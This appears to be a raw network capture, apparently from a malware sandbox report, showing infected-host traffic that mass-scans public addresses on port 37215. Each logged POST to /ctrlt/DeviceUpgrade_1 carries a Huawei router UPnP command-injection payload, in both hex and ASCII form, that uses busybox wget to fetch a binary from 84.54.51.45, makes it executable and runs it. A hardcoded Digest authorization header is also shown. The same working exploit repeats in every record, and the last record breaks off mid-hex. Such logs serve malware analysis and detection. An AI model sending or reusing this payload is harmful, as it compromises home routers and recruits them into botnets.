                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1958192.168.2.153846241.168.164.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600996971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1959192.168.2.154057241.31.155.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601021051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1960192.168.2.153579841.124.129.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601043940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1961192.168.2.153862041.232.67.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601066113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1962192.168.2.153427641.228.171.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601135015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1963192.168.2.154000041.124.112.21537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601138115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1964192.168.2.156010641.197.207.11237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601162910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1965192.168.2.154121841.230.33.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601183891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1966192.168.2.155718241.109.239.137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601207972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1967192.168.2.153458041.186.224.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601217031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 